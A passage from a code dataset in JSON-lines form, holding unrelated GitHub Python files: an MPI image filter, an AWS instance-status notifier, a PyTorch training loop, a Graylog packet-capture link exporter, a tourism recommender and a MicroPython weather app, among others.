concurrently. The other 12 will be responsible\r\n# for providing the neighbor pixels.\r\norder_arr = [\r\n [0, 6, 8, 14],\r\n [1, 7, 9, 15],\r\n [2, 4, 10, 12],\r\n [3, 5, 11, 13]\r\n]\r\n\r\n# This keeps track of each order of subimages we're filtering\r\norder_idx = 0\r\n\r\nsub_images = [\r\n [0, 1, 2, 3],\r\n [4, 5, 6, 7],\r\n [8, 9, 10, 11],\r\n [12, 13, 14, 15]\r\n]\r\n\r\nrank_neighbors = [\r\n [1, 4, 5], # Rank 0 neighbors\r\n [0, 2, 4, 5, 6], # Rank 1 neighbors\r\n [1, 3, 5, 6, 7], # Rank 2 neighbors\r\n [2, 6, 7], # Rank 3 neighbors\r\n [0, 1, 5, 8, 9], # Rank 4 neighbors\r\n [0, 1, 2, 4, 6, 8, 9, 10], # Rank 5 neighbors\r\n [1, 2, 3, 5, 7, 9, 10, 11], # Rank 6 neighbors\r\n [2, 3, 6, 10, 11], # Rank 7 neighbors\r\n [4, 5, 9, 12, 13], # Rank 8 neighbors\r\n [4, 5, 6, 8, 10, 12, 13, 14], # Rank 9 neighbors\r\n [5, 6, 7, 9, 11, 13, 14, 15], # Rank 10 neighbors\r\n [6, 7, 10, 14, 15], # Rank 11 neighbors\r\n [8, 9, 13], # Rank 12 neighbors\r\n [8, 9, 10, 12, 14], # Rank 13 neighbors\r\n [9, 10, 11, 13, 15], # Rank 14 neighbors\r\n [10, 11, 14] # Rank 15 neighbors\r\n]\r\n\r\ngaussian_kernel = [\r\n [0, 0, 3, 2, 2, 2, 3, 0, 0],\r\n [0, 2, 3, 5, 5, 5, 3, 2, 0],\r\n [3, 3, 5, 3, 0, 3, 5, 3, 3],\r\n [2, 5, 3, -12, -23, -12, 3, 5, 2],\r\n [2, 5, 0, -23, -40, -23, 0, 5, 2],\r\n [2, 5, 3, -12, -23, -12, 3, 5, 2],\r\n [3, 3, 5, 3, 0, 3, 5, 3, 3],\r\n [0, 2, 3, 5, 5, 5, 3, 2, 0],\r\n [0, 0, 3, 2, 2, 2, 3, 0, 0],\r\n]\r\n\r\ndef printr(msg, bypass=False):\r\n global message_count\r\n message_count += 1\r\n\r\n if debug and (message_count % 400 == 0 or bypass):\r\n f = open(\"debug\" + str(rank) + \".txt\", \"a+\")\r\n f.write(\"\\n\" + \"Message (\" + str(message_count) + \"): \" + msg)\r\n f.close()\r\n\r\n\r\n# Three Scenarios here when iterating over the gaussian matrix:\r\n# A) The kernel fits within our sub image, in which case we can just filter normally,\r\n# B) The kernel is outside the sub image but still inside the entire image, in which case we need to use MPI to get the value of the pixel that is outside our sub image bounds\r\n# C) The kernel is outside the sub image AND outside the entire image, in which case we set that value to 0 (Or in this functions case, we just don't do anything)\r\ndef filter_pixel(x, y, min_x, min_y, max_x, max_y):\r\n\r\n filtered_pixel = 0\r\n\r\n for j in range(9):\r\n for i in range(9):\r\n image_x_offset = i - 4\r\n image_y_offset = j - 4\r\n\r\n image_x = x + image_x_offset\r\n image_y = y + image_y_offset\r\n\r\n if (image_x < min_x or image_x > max_x or image_y < min_y or image_y > max_y) and (image_x >= 0 and image_x < 256 and image_y >= 0 and image_y < 256):\r\n\r\n # If were outside our sub image bounds, we need to call our neighbor in order to retreive the correct pixel\r\n neighbor_x = 0\r\n neighbor_y = 0\r\n \r\n # Find neighbor that has the pixel were looking for\r\n for row in range(4):\r\n for col in range(4):\r\n if rank == sub_images[row][col]:\r\n neighbor_x = col\r\n neighbor_y = row\r\n\r\n if image_x < min_x:\r\n neighbor_x -= 1\r\n elif image_x > max_x:\r\n neighbor_x += 1\r\n\r\n if image_y < min_y:\r\n neighbor_y -= 1\r\n elif image_y > max_y:\r\n neighbor_y += 1\r\n\r\n printr(\"Requesting pixel from neighbor: \" + str(sub_images[neighbor_y][neighbor_x]))\r\n req = comm.isend([image_y, image_x], dest=sub_images[neighbor_y][neighbor_x])\r\n req.wait()\r\n\r\n req = comm.irecv(source=sub_images[neighbor_y][neighbor_x])\r\n pixel_value = req.wait()\r\n\r\n filtered_pixel += gaussian_kernel[j][i] * pixel_value\r\n\r\n elif 
image_x >= 0 and image_x < 256 and image_y >= 0 and image_y < 256:\r\n filtered_pixel += gaussian_kernel[j][i] * original_image[image_y][image_x]\r\n\r\n if filtered_pixel > 255:\r\n filtered_pixel = 255\r\n\r\n if filtered_pixel < 0:\r\n filtered_pixel = 0\r\n\r\n return filtered_pixel\r\n\r\n# Create a matrix of 0s and fill it for the original image\r\npixel_values_1d = []\r\n\r\nf = open(\"pepper.ascii.pgm\", \"r\")\r\n\r\nlines = f.readlines()\r\nline_count = 0\r\n\r\n# Load original image from file\r\nfor line in lines:\r\n # Skip over first 4 lines in file\r\n if line_count > 3:\r\n pixel_values = line.split()\r\n for value in pixel_values:\r\n pixel_values_1d.append(int(value))\r\n else:\r\n line_count += 1\r\n\r\nf.close()\r\n\r\n# Convert 1D array to 256 x 256 2D array\r\noriginal_image = np.reshape(pixel_values_1d, (256,256))\r\n\r\n# Rank 16 will be responsible for reconstructing and writing to the PGM filtered file\r\nif rank == 16:\r\n\r\n pixels = 256 * 256\r\n pixels_filtered = 0\r\n\r\n filtered_image = np.zeros((256, 256))\r\n\r\n # Well send a 3 item array, [pixel_x_coor, pixel_y_coor, pixel_filtered_value], and add it to the filtered array.\r\n while (pixels_filtered < pixels):\r\n req = comm.irecv(source=MPI.ANY_SOURCE)\r\n pixel_filtered_info = req.wait()\r\n filtered_image[pixel_filtered_info[1], pixel_filtered_info[0]] = pixel_filtered_info[2]\r\n pixels_filtered += 1\r\n\r\n printr(str(pixels_filtered) + \"/65536\")\r\n\r\n # Writing an output file\r\n # This will be the end of our program.\r\n f = open(\"output.pgm\", \"w\")\r\n\r\n printr(\"OUTPUTTING: \")\r\n line = \"P2 \" + \"\\n\" + \"256 256 \" + \"\\n\" + \"255\" + \"\\n\"\r\n\r\n max_number = 0\r\n for j in range(256):\r\n for i in range(256):\r\n \r\n if max_number > 16:\r\n line += \"\\n\"\r\n max_number = 0\r\n\r\n if (max_number != 0):\r\n line += \" \"\r\n\r\n line += str(int(filtered_image[j][i]))\r\n\r\n max_number += 1\r\n\r\n line += \"\\n\"\r\n f.write(line)\r\n f.close()\r\n\r\n# Rank 17 will be the controller process\r\nelif rank == 17: \r\n\r\n while(order_idx != 4):\r\n\r\n # Start by setting each process type\r\n for curr_rank in range (16):\r\n if curr_rank in order_arr[order_idx]:\r\n printr(\"Setting \" + str(curr_rank) + \" to Filter\", True)\r\n req = comm.isend(\"Filter\", dest=curr_rank)\r\n req.wait()\r\n\r\n else:\r\n printr(\"Setting \" + str(curr_rank) + \" to Provide\", True)\r\n req = comm.isend(\"Provide\", dest=curr_rank)\r\n req.wait()\r\n\r\n\r\n done = 0\r\n done_arr = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\r\n\r\n printr(\"Will now wait for every Subimage to finish this layer\", True)\r\n\r\n # When all kernels are done providing / filtering, we move to the next order\r\n while done != 16:\r\n for curr_rank, is_done in enumerate(done_arr):\r\n if is_done != 1:\r\n printr(\"Waiting on rank: \" + str(curr_rank), True)\r\n req = comm.irecv(source=curr_rank)\r\n req.wait()\r\n\r\n done_arr[curr_rank] = 1\r\n done += 1\r\n printr(str(done) + \" subimages finished in order layer: \" + str(order_idx), True)\r\n\r\n order_idx += 1\r\n\r\nelse:\r\n while (order_idx != 4):\r\n\r\n req = comm.irecv(source=17)\r\n filter_or_provide = req.wait()\r\n\r\n # Get offsets for where they are in array\r\n # So sub image 5 will have offset x = 63 offset y = 63 for example\r\n offset_x = rank % 4 * 64\r\n offset_y = int(rank / 4) * 64\r\n\r\n if (offset_x > 0):\r\n offset_x - 1\r\n if (offset_y > 0):\r\n offset_y - 1\r\n\r\n if (filter_or_provide == \"Filter\"):\r\n\r\n 
printr(\"Currently Filtering!\", True)\r\n for j in range(64):\r\n for i in range (64):\r\n x = i + offset_x\r\n y = j + offset_y\r\n\r\n # Send rank 16 the filtered pixel\r\n filtered_pixel_value = filter_pixel(x, y, offset_x, offset_y, offset_x + 64, offset_y + 64)\r\n\r\n printr(\"Sending pixel value: \" + str(filtered_pixel_value)+ \" to 16 (Constructor)\")\r\n\r\n req = comm.isend([x, y, filtered_pixel_value], dest=16)\r\n req.wait()\r\n \r\n # Tell our neighbor processes that were done filtering\r\n for neighbor in rank_neighbors[rank]:\r\n req = comm.isend(1, dest=neighbor)\r\n req.wait()\r\n\r\n # Tell controller were done filtering this sub image\r\n printr(\"Done filtering!\", True)\r\n req = comm.isend(True, dest=17)\r\n req.wait()\r\n\r\n\r\n else:\r\n\r\n printr(\"Currently Providing!\", True)\r\n neighbors_that_need_this_provider = 0\r\n neighbor_done_count = 0\r\n neighbors_in_order = []\r\n\r\n\r\n # Each provider process needs to know how many \"done\"\r\n # messages it needs to receive.\r\n for neighbor in rank_neighbors[rank]:\r\n if neighbor in order_arr[order_idx]:\r\n neighbors_that_need_this_provider += 1\r\n neighbors_in_order.append(neighbor)\r\n\r\n while neighbor_done_count != neighbors_that_need_this_provider:\r\n for neighbor in neighbors_in_order:\r\n\r\n printr(\"Waiting on neighbor: \" + str(neighbor))\r\n if comm.Iprobe(source=neighbor):\r\n req = comm.irecv(source=neighbor)\r\n data = req.wait()\r\n\r\n # We wait to receive data from filtering neighbor.\r\n # If we recieve a done message, we just increment the done count,\r\n # else we provide them with the requested pixel value\r\n if data == 1:\r\n neighbor_done_count += 1\r\n else:\r\n req = comm.isend(original_image[data[0], data[1]], dest=neighbor)\r\n req.wait()\r\n \r\n # Tell controller were done providing\r\n printr(\"Done Providing!\", True)\r\n req = comm.isend(True, dest=17)\r\n req.wait()\r\n\r\n \r\n # Keep track of what layer we are in each individual process\r\n order_idx += 1\r\n \r\n","repo_name":"Jtboone1/Concurrent_A4","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9795097820","text":"import os\nimport os.path\n\nfrom boto3.session import Session\nimport click\nimport toml\n\nimport notify\n\n\ndef get_profiles(config):\n if 'aws_profiles' not in config:\n return {\n 'default': Session()\n }\n\n return {\n prof: Session(profile_name=prof)\n for prof in config['aws_profiles']\n }\n\n\n# TODO: truly support instance-status, system-status.\ndef get_instance_statuses(ec2_client, config):\n def _filter(filters):\n _statuses = []\n next_token = ''\n\n while True:\n res = ec2_client.describe_instance_status(\n Filters=[\n {'Name': k, 'Values': v}\n for k, v in filters.iteritems()\n ],\n NextToken=next_token,\n MaxResults=1000\n )\n\n # We don't care about completed events. 
Thanks amazon for this\n # wonderful API.\n active_events = [\n status\n for status in res['InstanceStatuses']\n for event in status.get('Events', [])\n if not event['Description'].startswith('[Completed]')\n ]\n\n # Don't alert if we don't have any active events\n if len(active_events):\n _statuses.extend(active_events)\n next_token = res.get('NextToken')\n\n if not next_token:\n break\n\n return _statuses\n\n # describe_instance_status is an AND of filters, we want an OR\n seen = set()\n results = [\n _filter({'event.code': ['*']}),\n _filter({'instance-status.status': ['impaired']}),\n _filter({'instance-status.reachability': ['failed']}),\n _filter({'system-status.status': ['impaired']}),\n _filter({'system-status.reachability': ['failed']}),\n ]\n\n statuses = []\n for instances in results:\n statuses.extend([i for i in instances if i['InstanceId'] not in seen])\n seen.update([i['InstanceId'] for i in instances])\n\n return statuses\n\n\ndef get_config(config_locations):\n for loc in config_locations:\n file_name = os.path.expanduser(loc)\n\n if os.path.exists(file_name):\n click.echo('using config %s' % file_name, err=True)\n\n with open(file_name) as fp:\n return toml.loads(fp.read())\n\n\n@click.command()\n@click.option('--dry-run', is_flag=True, help='Disables sending alerts')\n@click.option('--config', required=False, help='Configuration file location')\n@click.option('--quiet', '-q', is_flag=True, help='Disables default JSON output')\ndef main(dry_run, config, quiet):\n config_names = [config] if config else ['pension.toml', '~/.pension.toml']\n\n try:\n config = get_config(config_names)\n except:\n click.echo('Failed to parse config', err=True)\n return -1\n\n if config is None:\n click.echo('No usable config file, trying environment vars', err=True)\n config = {'notify': {'json': {}}}\n\n data = {'instances': [], 'profiles': {}}\n instance_map = {}\n\n for prof, session in get_profiles(config).iteritems():\n ec2_client = session.client('ec2')\n ec2 = session.resource('ec2')\n\n statuses = get_instance_statuses(ec2_client, config)\n\n data['profiles'][prof] = {\n 'region': session._session.get_config_variable('region'),\n 'instances': [s['InstanceId'] for s in statuses]\n }\n data['instances'].extend(statuses)\n\n if statuses:\n # Keep track of boto ec2 instances\n instance_list = ec2.instances.filter(InstanceIds=[\n s['InstanceId'] for s in statuses\n ])\n\n instance_map.update({\n i.instance_id: i\n for i in instance_list\n })\n\n click.echo('%d instance(s) have reported issues' % len(data['instances']),\n err=True)\n\n if dry_run:\n config['notify'] = {} if quiet else {'json': {}}\n\n notify.send(data, instance_map, config['notify'])\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"erik/pension","sub_path":"pension/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":4059,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"37"} +{"seq_id":"3215231456","text":"import torch\nfrom tqdm import tqdm\n\nfrom share_funcs import get_model, get_loaders, get_criterion, get_optimizer\n\n\ndef train(model, data_loader, criterion, optimizer, device, grad_acc=1):\n model.train()\n\n # zero the parameter gradients\n optimizer.zero_grad()\n\n total_loss = 0.\n for i, (inputs, labels) in tqdm(enumerate(data_loader), total=len(data_loader)):\n inputs = inputs.to(device)\n labels = labels.to(device)\n\n outputs = model(inputs)\n\n loss = criterion(outputs, labels)\n loss.backward()\n\n # Gradient accumulation\n if (i % grad_acc) == 
0:\n optimizer.step()\n optimizer.zero_grad()\n\n total_loss += loss.item()\n\n total_loss /= len(data_loader)\n metrics = {'train_loss': total_loss}\n return metrics\n\n\ndef eval(model, data_loader, criterion, device):\n model.eval()\n num_correct = 0.\n\n with torch.no_grad():\n total_loss = 0.\n for inputs, labels in tqdm(data_loader, total=len(data_loader)):\n inputs = inputs.to(device)\n labels = labels.to(device)\n\n outputs = model(inputs)\n _, preds = torch.max(outputs, 1)\n\n loss = criterion(outputs, labels)\n\n total_loss += loss.item()\n num_correct += torch.sum(preds == labels.data)\n\n total_loss /= len(data_loader)\n num_correct /= len(data_loader.dataset)\n metrics = {'valid_loss': total_loss, 'val_acc': num_correct}\n return metrics\n\n\ndef main():\n epochs = 10\n\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n model = get_model()\n train_loader, val_loader = get_loaders()\n optimizer, lr_scheduler = get_optimizer(model=model)\n criterion = get_criterion()\n\n # Model を multi-gpu したり、FP16 対応したりする\n model = model.to(device)\n\n print('Train start !')\n for epoch in range(epochs):\n print(f'epoch {epoch} start !')\n metrics_train = train(model, train_loader, criterion, optimizer, device)\n metrics_eval = eval(model, val_loader, criterion, device)\n\n lr_scheduler.step()\n\n # Logger 周りの処理\n # print するためのごちゃごちゃした処理\n print(f'epoch: {epoch} ', metrics_train, metrics_eval)\n\n # tqdm 使ってたらさらにごちゃごちゃする処理をここに書く\n # Model を保存するための処理\n # Multi-GPU の場合さらに注意して書く\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"yukkyo/Compare-PyTorch-Catalyst-Ignite-Lightning","sub_path":"train_default.py","file_name":"train_default.py","file_ext":"py","file_size_in_byte":2523,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"37"} +{"seq_id":"15198713332","text":"import re\r\nimport config\r\nimport commands\r\nimport json\r\nimport csv\r\n\r\n# Manual Configuration\r\ngraylog_host = config.graylog_hostname\r\ntoken = config.graylog_token\r\nstream_id = config.graylog_stream\r\ntemp_from_date = config.from_date \t\t# If Manual Time Frame Selection in config\r\ntemp_to_date = config.to_date # If Manual Time Frame Selection in config\r\n# End of Manual Configuration\r\n\r\ndef graylog_export(): \r\n\tpkt_capture= []\r\n\t# auto_config_timeframe = config.cron_config()\t# If Automated Time Frame Selection in config\r\n\t# temp_from_date = auto_config_timeframe[0]\t\t# If Automated Time Frame Selection in config\r\n\t# temp_to_date = auto_config_timeframe[1]\t\t# If Automated Time Frame Selection in config\r\n\r\n\tfrom_regex = re.search('(.*)[\\s]+(\\d\\d):(\\d\\d):(\\d\\d)',temp_from_date)\r\n\tfrom_date = from_regex.groups()[0]\r\n\tfrom_hour = from_regex.groups()[1]\r\n\tfrom_mins = from_regex.groups()[2]\r\n\tfrom_secs = from_regex.groups()[3]\r\n\tto_regex = re.search('(.*)[\\s]+(\\d\\d):(\\d\\d):(\\d\\d)',temp_to_date)\r\n\tto_date = to_regex.groups()[0]\r\n\tto_hour = to_regex.groups()[1]\r\n\tto_mins = to_regex.groups()[2]\r\n\tto_secs = to_regex.groups()[3]\r\n\r\n\turl = \"https://{}:9000/api/search/universal/absolute?query=device_vendor%3AMcAfee%20AND%20streams%3A{}&from={}%20{}%3A{}%3A{}&to={}%20{}%3A{}%3A{}&fields=Packet_Capture_Link_RT\".format(graylog_host,stream_id,from_date,from_hour,from_mins,from_secs,to_date,to_hour,to_mins,to_secs)\r\n\tcurlCmd = \"curl -k -u %s:token -X GET '%s' > packet_capture.csv\" %(token,url)\r\n\toutput = commands.getoutput(curlCmd)\r\n\t\r\n\twith open('packet_capture.csv', 
'rb') as csvfile:\r\n\t\treader = csv.reader(csvfile, delimiter=',', quotechar='\"')\r\n\t\treader.next()\r\n\t\tfor row in reader:\r\n\t\t\tpkt_capture.append(row[1])\r\n\t\r\n\treturn list(pkt_capture)\r\n\t\t\r\n\r\nif __name__ == '__main__':\r\n func = graylog_export()","repo_name":"naren-jayram/McAfee-IDS-PCAP-Exporter","sub_path":"graylog_pcap_link_exporter.py","file_name":"graylog_pcap_link_exporter.py","file_ext":"py","file_size_in_byte":1821,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"34994990988","text":"MAPPING_TYPE = 'Mapping'\nSAME_AS = 'SAME-AS'\n\nMAPPING_WAS_RETIRED = 'Mapping was retired'\nMAPPING_WAS_UNRETIRED = 'Mapping was un-retired'\nMAPPING_IS_ALREADY_RETIRED = 'Mapping is already retired'\nMAPPING_IS_ALREADY_NOT_RETIRED = 'Mapping is already not retired'\nPERSIST_CLONE_ERROR = 'An error occurred while saving new concept version.'\nPARENT_VERSION_NOT_LATEST_CANNOT_UPDATE_MAPPING = 'Parent version is not the latest. Cannot update mapping.'\nPERSIST_CLONE_SPECIFY_USER_ERROR = \"Must specify which user is attempting to create a new mapping version.\"\nOPENMRS_SINGLE_MAPPING_BETWEEN_TWO_CONCEPTS = 'There can be only one mapping between two concepts'\nOPENMRS_INVALID_MAPTYPE = 'Invalid mapping type'\nOPENMRS_EXTERNAL_ID_LENGTH = 36\nOPENMRS_MAPPING_EXTERNAL_ID_ERROR = f'Mapping External ID cannot be more than {OPENMRS_EXTERNAL_ID_LENGTH} characters.'\nMUST_SPECIFY_FROM_CONCEPT = \"Must specify a 'from_concept'.\"\nMUST_SPECIFY_TO_CONCEPT_OR_TO_SOURCE = \"Must specify either 'to_concept_url' or 'to_source_url' & 'to_concept_code'.\"\nTO_SOURCE_UNIQUE_ATTRIBUTES_ERROR_MESSAGE = \"Parent, map_type, from_concept, to_source, to_concept_code must be unique.\"\nALREADY_EXISTS = \"Mapping ID must be unique within a source.\"\n","repo_name":"OpenConceptLab/oclapi2","sub_path":"core/mappings/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"30496078969","text":"class Solution(object):\r\n def intToRoman(self, num):\r\n \"\"\"\r\n :type num: int\r\n :rtype: str\r\n \"\"\"\r\n origin_num = num # original number\r\n \r\n element_num = [1, 4, 5, 9, 10, 40, 50, 90, 100, 400, 500, 900, 1000]\r\n element_sym = [\"I\", \"IV\", \"V\", \"IX\", \"X\", \"XL\", \"L\", \"XC\", \"C\", \"CD\", \r\n \"D\", \"CM\", \"M\"]\r\n assert len(element_num) == len(element_sym)\r\n # list of symbol and value\r\n sv_list = [(sym, num) for sym, num in zip(element_sym, element_num)]\r\n vs_list = [(num, sym) for sym, num in zip(element_sym, element_num)]\r\n # build two-way dictionary\r\n sym2val = dict(sv_list)\r\n val2sym = dict(vs_list)\r\n\r\n element_cnt = {i: 0 for i in element_num}\r\n # stack is the copy of element_num\r\n stack = [i for i in element_num]\r\n \r\n num = origin_num # assign origin_num back to num\r\n while num > 0:\r\n top = stack[-1]\r\n if num >= top:\r\n num -= top\r\n element_cnt[top] += 1\r\n else:\r\n stack.pop()\r\n \r\n ret = \"\"\r\n for num, sym in zip(element_num[::-1], element_sym[::-1]):\r\n ret += sym * element_cnt[num]\r\n \r\n return ret","repo_name":"ycchhueannu/LeetCode","sub_path":"python/0012_Integer_to_Roman.py","file_name":"0012_Integer_to_Roman.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"7017239798","text":"import numpy as np\r\nimport pandas as 
pd\r\nimport csv\r\nimport matplotlib.pyplot as plt\r\n\r\nimport seaborn as sns\r\nimport plotly.express as px\r\n\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nfrom Sastrawi.Stemmer.StemmerFactory import StemmerFactory\r\nfrom Sastrawi.StopWordRemover.StopWordRemoverFactory import StopWordRemoverFactory\r\nfrom sklearn.metrics.pairwise import cosine_similarity\r\n\r\nfrom zipfile import ZipFile\r\nimport tensorflow as tf\r\nfrom tensorflow import keras\r\nfrom tensorflow.keras import layers\r\nfrom pathlib import Path\r\n\r\ntv = TfidfVectorizer(max_features=5000)\r\nstem = StemmerFactory().create_stemmer()\r\nstopword = StopWordRemoverFactory().create_stop_word_remover()\r\n\r\ndata_tourism_rating = pd.read_csv('tourism_rating.csv')\r\ndata_tourism_with_id = pd.read_csv('tourism_with_id.csv')\r\ndata_user = pd.read_csv('user.csv')\r\n\r\nprint(data_tourism_rating.head())\r\nprint(data_tourism_with_id.head())\r\nprint(data_user.head())\r\n\r\ndata_tourism_with_id.drop(['Rating','Time_Minutes','Coordinate','Lat','Long','Unnamed: 11','Unnamed: 12'],axis=1,inplace=True)\r\n\r\nprint(\"-----\")\r\nprint(data_tourism_with_id)\r\n\r\ndata_rekomendasi = pd.merge(data_tourism_rating.groupby('Place_Id')['Place_Ratings'].mean(),data_tourism_with_id,on='Place_Id')\r\nprint(\"------\")\r\nprint(data_rekomendasi)\r\n\r\ndef preprocessing(data):\r\n data = data.lower()\r\n data = stem.stem(data)\r\n data = stopword.remove(data)\r\n return data\r\n\r\ndata_content_based_filtering = data_rekomendasi.copy()\r\ndata_content_based_filtering['Tags'] = data_content_based_filtering['Description'] + ' ' + data_content_based_filtering['Category']\r\ndata_content_based_filtering.drop(['Price','Place_Ratings','Description','Category'],axis=1,inplace=True)\r\nprint(\"----\")\r\nprint(\"Data Filltering\")\r\nprint(data_content_based_filtering)\r\n\r\ndata_content_based_filtering.Tags = data_content_based_filtering.Tags.apply(preprocessing)\r\nprint(\"----\")\r\nprint(data_content_based_filtering)\r\n\r\nvectors = tv.fit_transform(data_content_based_filtering.Tags).toarray()\r\nprint(\"-----\")\r\nprint(\"Vectors\")\r\nprint(vectors)\r\n\r\nsimilarity = cosine_similarity(vectors)\r\nsimilarity[0][1:10]\r\nprint(\"----\")\r\nprint(\"Similarity\")\r\nprint(similarity)\r\n\r\ndef recommend_by_content_based_filtering(nama_tempat):\r\n nama_tempat_index = data_content_based_filtering[data_content_based_filtering['City']==nama_tempat].index[0]\r\n distancess = similarity[nama_tempat_index]\r\n nama_tempat_list = sorted(list(enumerate(distancess)),key=lambda x: x[1],reverse=True)[1:20]\r\n \r\n recommended_nama_tempats = []\r\n for i in nama_tempat_list:\r\n recommended_nama_tempats.append(([data_content_based_filtering.iloc[i[0]].Place_Name]+[i[1]]))\r\n \r\n return recommended_nama_tempats\r\nprint(\"----\")\r\nprint(\"Berikut Hasil Rekomendasi :\")\r\nprint(\"^^\")\r\nprint(recommend_by_content_based_filtering('Jakarta'))\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"simple1809/rekomendasi","sub_path":"parwis.py","file_name":"parwis.py","file_ext":"py","file_size_in_byte":2876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18894751967","text":"import nltk\nfrom urllib import urlopen\n#https://stackoverflow.com/questions/328356/extracting-text-from-html-file-using-python\n#I could do a loop for a url list example https://stackoverflow.com/questions/18952351/scrape-html-files-stored-in-remote-directory\nurl = 
\"http://www.lens.org/lens/patent/US_7469381_B2/fulltext\"\n#do a partition hear to create the file name\nhtml = urlopen(url).read()\nnewfile = open('US_7469381_B2_fulltext.html','w') #YAY! saving it as an html file works like a charm motha fucka!\nnewfile.write(html)\n\n\nraw = nltk.clean_html(html) #this code processes the file into text the rest of the code can read. It will need to be in the other files.\nprint(raw)\n\n\n#shit this is super clean\n\n","repo_name":"rcmckee/InvalidPatents","sub_path":"_downloadhtml.py","file_name":"_downloadhtml.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"22987818308","text":"import ujson as json\nimport lvgl as lv\nfrom lv_colors import lv_colors\n\nMAX_METAWEATHER_ICON = 10\nMAX_DAY = 5\ntry:\n import urequests\nexcept:\n pass\n\nclass WeatherApp():\n \n def __init__(self,mainbar):\n try:\n import ulogging as logging\n except:\n import logging\n self.log = logging.getLogger(\"WeatherApp\")\n self.log.setLevel(logging.DEBUG) \n self.day_index = 0\n self.woeid=\"784794\" #woeid for Zürich\n self.lat = \"47.52637\"\n self.lon = \"9.74882\"\n\n self.retrieved = False\n self.date = []\n self.weather_state_abbr = []\n self.weather_state_name = []\n self.min_temp = []\n self.max_temp = []\n self.humid = []\n self.predic = []\n self.wind_speed = []\n self.wind_direction = []\n self.air_pressure = []\n self.loc = \"\"\n self.time = \"\"\n self.icon_data=[None]*MAX_METAWEATHER_ICON\n self.icon_dsc=[None]*MAX_METAWEATHER_ICON\n self.icon_filename={'c':'c_64px',\n 'h':'h_64px',\n 'hc':'hc_64px',\n 'hr':'hr_64px',\n 'lc':'lc_64px',\n 'lr':'lr_64px',\n 's':'s_64px',\n 'sl':'sl_64px',\n 'sn':'sn_64px',\n 't':'t_64px'}\n\n self.mainbar=mainbar\n self.statusbar=mainbar.gui.statusbar\n self.app = mainbar.app\n \n self.tile_num = mainbar.add_app_tile( 1, 1, \"weather app\" )\n self.log.debug(\"tile number for main tile: %d\",self.tile_num)\n \n self.log.debug(\"registering weather app\")\n app=self.app.register(\"weather\",\"lc_64px\",self.enter_weather_app_event_cb)\n \n try:\n self.get_forecast()\n self.log.info(\"Reading weather forecast from metaweather.com\")\n except:\n self.log.info(\"Reading weather forecast from file metaweather.json\")\n self.read_forecast_from_file()\n\n #\n # create the icons\n #\n keys = list(self.icon_filename.keys())\n for key in keys:\n self.log.debug(\"Key: %s\"%key)\n index = keys.index(key)\n (self.icon_data[index],self.icon_dsc[index]) = self.get_icon(self.icon_filename[key])\n self.main_page(self.tile_num)\n self.widget = mainbar.gui.widget\n self.add_widget()\n \n def get_forecast(self):\n url = \"https://www.metaweather.com/api/location/%s/\"%self.woeid\n response = urequests.get(url)\n if response.status_code == 200: # query successful\n # write response to file for testing\n # print(response.text)\n # parse JSON\n data = response.json()\n # print(data)\n response.close()\n # dump the data to a file\n with open('json/metaweather.json', 'w') as json_file:\n json.dump(data, json_file)\n self.decode(data)\n else:\n self.log.error(\"Query failed, error code was: %d\"%response.status_code)\n\n def decode(self,data):\n self.loc = (data[\"title\"])[:18]\n self.time = data[\"time\"]\n for i in range(MAX_DAY+1):\n w_data = data[\"consolidated_weather\"][i]\n self.date.append(w_data[\"applicable_date\"])\n self.weather_state_name.append(w_data[\"weather_state_name\"])\n self.min_temp.append(float(w_data[\"min_temp\"]))\n 
self.max_temp.append(float(w_data[\"max_temp\"]))\n self.humid.append(int(w_data[\"humidity\"]))\n self.predic.append(int(w_data[\"predictability\"]))\n self.wind_direction.append(w_data[\"wind_direction_compass\"])\n self.air_pressure.append(w_data[\"air_pressure\"])\n self.weather_state_abbr.append(w_data[\"weather_state_abbr\"])\n self.wind_speed.append(w_data[\"wind_speed\"]*1.609) # convert to kph\n self.location = data[\"title\"]\n self.log.debug(\"Location: %s\"%self.location)\n \n def print_weather_info(self):\n for i in range(MAX_DAY+1):\n output_str = \"Date: {0} [{1}%], State: {2}, Temp: {3}/{4} *C, Humid: {5}\\n State Abbreviation: {6} Airpressure: {7}, Wind direction: {8}\"\n self.log.debug(output_str.format(self.date[i], self.predic[i], self.weather_state_name[i], self.max_temp[i], self.min_temp[i],\n self.humid[i], self.weather_state_abbr[i], self.air_pressure[i],self.wind_direction[i]))\n \n def read_forecast_from_file(self):\n with open('json/metaweather.json') as f:\n data = json.load(f)\n self.decode(data)\n\n def get_icon(self,filename):\n\n try:\n sdl_filename = 'images/' + filename + \"_argb8888.bin\"\n self.log.debug('sdl filename: ' + sdl_filename)\n with open(sdl_filename,'rb') as f:\n app_icon_data = f.read()\n self.log.debug(sdl_filename + \" successfully read\")\n except:\n twatch_filename = 'images/' + filename + \"_argb565.bin\"\n self.log.debug('t-watch filename: ' + twatch_filename)\n try:\n with open(twatch_filename,'rb') as f:\n app_icon_data = f.read()\n self.log.debug(twatch_filename + \" successfully read\")\n \n except:\n self.log.error(\"Could not find image file: \" + filename) \n\n icon_dsc = lv.img_dsc_t(\n {\n \"header\": {\"always_zero\": 0, \"w\": 64, \"h\": 64, \"cf\": 